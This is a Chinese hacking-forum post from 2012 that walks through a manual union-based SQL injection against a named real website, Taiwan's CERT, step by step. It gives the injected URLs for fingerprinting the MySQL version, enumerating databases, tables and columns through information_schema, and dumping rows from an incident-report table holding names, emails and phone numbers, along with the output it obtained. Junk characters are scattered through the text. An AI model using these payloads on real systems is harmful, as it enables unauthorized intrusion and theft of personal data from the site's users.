找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1952|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
  [7 b8 u" W. [* ]+ C* ]" U  |2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解4 z. S6 ]+ s2 p0 f& v
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--7 d$ O- _- ~4 \
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--) O0 ]5 T$ H* a; w( D2 ^
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。8 l7 B2 r# {3 v0 n
4.判断有没有写权限$ N3 l( X+ v. d, x9 K/ [* e
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
2 r7 C7 m7 D6 P  f0 B3 W. g没办法,手动猜表啦
# S) d+ z& M4 Q5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,13 _3 }8 W7 t, N9 `: D
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下, Z! X9 t1 Q4 i1 \+ c$ g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--3 @, j; v# }7 Z$ q% {7 y8 B6 `
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
4 B0 J6 V# N  l) P% e% F8 o5 l0 Qinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb& l, R+ C' L* j
6.爆表,爆的是twcert库0 ^9 l$ s$ m4 X5 z1 \! s$ l0 ]
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--8 }: \  a7 Q) X5 h# R6 e  ]5 u
爆出如下表
/ j2 M) s( a2 g" j# A. Mdownloadfile,irsys,newsdata,secrpt,secrpt_big5
0 `( V3 u6 `$ s. l* i) N7.爆列名,这次爆的是irsys表
0 D+ `2 P7 G& W- t+ W$ P# yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--% s- ?! S! ]! J& X
爆出如下列/ P# M5 I6 j; h- V' Q
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
- M# Y, K& X$ X, H1 [0 @) ?  ]8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
5 q) P8 T; S9 T& ^http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--# D: X% v! e0 y; T" d# A, {1 A
返回是3,说明每个列里有3个地段
# Q1 ^# X6 T0 E5 ^9.爆字段内容
' `7 k5 K! T/ X; b8 Zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
) x+ B; V2 A5 Y# l# R爆出name列的第一个字段的内容
* r6 r% n# Y$ N" Q! w/ k7 T- \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--2 ~1 s! ]" q0 M1 v6 F
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表